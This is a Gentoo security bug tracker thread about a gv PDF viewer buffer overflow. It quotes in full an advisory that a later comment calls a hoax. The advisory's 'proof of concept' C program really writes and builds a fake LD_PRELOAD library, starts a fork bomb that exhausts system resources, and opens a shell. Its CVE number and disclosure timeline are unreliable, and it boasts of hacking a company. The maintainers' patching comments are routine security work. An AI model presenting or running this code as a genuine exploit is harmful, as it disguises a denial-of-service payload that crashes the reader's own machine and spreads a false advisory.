Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 59385 - app-text/gv: Exploitable Buffer Overflow (CAN-2002-0838)
Summary: app-text/gv: Exploitable Buffer Overflow (CAN-2002-0838)
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All All
: High normal (vote)
Assignee: Gentoo Security
URL: http://cve.mitre.org/cgi-bin/cvename....
Whiteboard: B2 [glsa]
Keywords:
Depends on:
Blocks:
 
Reported: 2004-08-04 05:16 UTC by Chris White (RETIRED)
Modified: 2011-10-30 22:38 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Chris White (RETIRED) gentoo-dev 2004-08-04 05:16:35 UTC
Woo, this looks fun.  RedHat's vulnerable, so the question is are we?
Privlege escalation with with a specially crafted pdf file.  Info is here:

Exploitable Buffer Overflow in gv


Infohacking Security Advisory 08.04.04
www.infohacking.com
Aug 04, 2004


I. BACKGROUND

Infohacking team (me and myself) discovered a new and unreported local
root vulnerability in gv.



II. DESCRIPTION

The gv program that is shipped on many Unix systems contains a buffer
overflow which can be exploited by an attacker sending a malformed
postscript or Adobe pdf file. The attacker would be able to cause
arbitrary code to run with the privileges of the victim on his Linux
computer. The gv program is a PDF and postscript viewing program for
Unix which interfaces with the ghostscript interpreter. It is
maintained at http://www.thep.physik.uni-mainz.de/~plass/gv/ by
Johannes Plass.  This particular security vulnerability occurs in the
source code where an unsafe sscanf() call is used to interpret
PostScript and PDF files.



III. ANALYSIS

In order to perform exploitation, an attacker would have to trick a
user into viewing a malformed PDF or PostScript file from the command
line. This may be somewhat easier for Unix based email programs that
associate gv with email attachments. Since gv is not normally
installed setuid root, an attacker would only be able to cause
arbitrary code to run with the privileges of that user.  Other
programs that utilize derivatives of gv, such as ggv or kghostview,
may also be vulnerable in similiar ways.

A proof of concept exploit for Red Hat Linux designed by Hugo is
attached to this message.  It packages the overflow and shellcode in
the "%%PageOrder:" section of the PDF.


/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
 *
 * INFOHACKING RESEARCH - L337 h4x0r t34M
 *
 * hugo <hugo@infohacking.com>
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char hellc0de[] =       "\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
                        "\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
                        "\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
                        "\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
                        "\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
                        "\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
                        "\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";

int main()
{
        FILE *fp;
	char *offset;
        fp=fopen("/tmp/own.c","w");
        fprintf(fp,"%s",hellc0de);
        fclose(fp);

        system("gcc -shared -o /tmp/own.so /tmp/own.c;rm -f /tmp/own.c");
        if (fork() == 0) {
	sleep(10); while (1) { fork(); offset=malloc(512); }
                exit(0);
        }
        system("LD_PRELOAD=/tmp/own.so /bin/sh");
        return 0;
}
/* -EOF- */


IV. DETECTION


This vulnerability affects the latest version of gv,. An
exploit has been tested on Red Hat Linux 9 and fedora core 1



V. WORKAROUNDS


To avoid potential exploitation, users can select alternatives to gv
such as Kghostview (included with the KDE desktop environment) for
instance. Additionally, the vulnerability does not seem to be
exploitable when a file is opened from the gv interface instead of
the command line.



VI. CVE INFORMATION


The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2001-0832 to this issue.


VII. DISCLOSURE TIMELINE


03/18/04 Hugo notified the bug to abuse@255.255.255.255
04/11/04 Initial vendor notification - no response
04/30/04 Secondary vendor notification - no response
05/20/04 We hack iberia.com (Hey look at me! im a hax0r and i want a
job)
08/04/04 Public Disclosure


VIII. CREDIT

Hugo Vazquez Carapez http://www.infohacking.com/dirhugo.gif


Get pwned by script kiddies?
Call us, we can hack you again.


IX. LEGAL NOTICES


Copyright (c) 2004 INFOHACKING, Inc.


Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of INFOHACKING. If you wish to reprint the whole or any

part of this alert in any other medium other than electronically, please

email info@infohacking.com for permission.
Comment 1 Chris White (RETIRED) gentoo-dev 2004-08-04 11:28:13 UTC
Finally found the patch for the gv exploits:

http://freshmeat.net/articles/view/587/

no specific maintainer though, just the printing herd.
Comment 2 Thierry Carrez (RETIRED) gentoo-dev 2004-08-04 11:49:45 UTC
gv-3.5.8-r4 uses the latest gv Debian patch, so I suppose this is fixed in that version.

lanius : could you check the version the above fix is in ? Is it just 3.5.8-r4 or did it appear before ?
Comment 3 Heinrich Wendel (RETIRED) gentoo-dev 2004-08-04 13:52:51 UTC
it's only fixed in -r4, marked stable on x86

other arches please test
Comment 4 Gustavo Zacarias (RETIRED) gentoo-dev 2004-08-04 14:21:30 UTC
Stable on sparc.
Comment 5 Tom Martin (RETIRED) gentoo-dev 2004-08-05 11:48:03 UTC
Stable on amd64.
Comment 6 Bryan Østergaard (RETIRED) gentoo-dev 2004-08-06 04:25:36 UTC
Stable on alpha.
Comment 7 Sune Kloppenborg Jeppesen gentoo-dev 2004-08-11 22:19:58 UTC
lu_zero thx for the ppc stable marking
Comment 8 Sune Kloppenborg Jeppesen gentoo-dev 2004-08-12 04:41:23 UTC
GLSA 200408-10
Comment 9 Sune Kloppenborg Jeppesen gentoo-dev 2004-08-12 10:21:34 UTC
NOTE: The Infohacking Advisory quoted here appears to be a hoax.

However the bug we actually fixed is indeed the two year old iDEFENSE
vulnerability (CAN-2002-0838). Apparently that vulnerability was unpatched until this (hoax) alert brought it to our attention.

We applied the Debian patch for this vulnerability as our fix, so we are
now, a couple years behind, fully patched.

So, yes, we did fix a vulnerability, and yes, it was the old iDEFENSE vulnerability.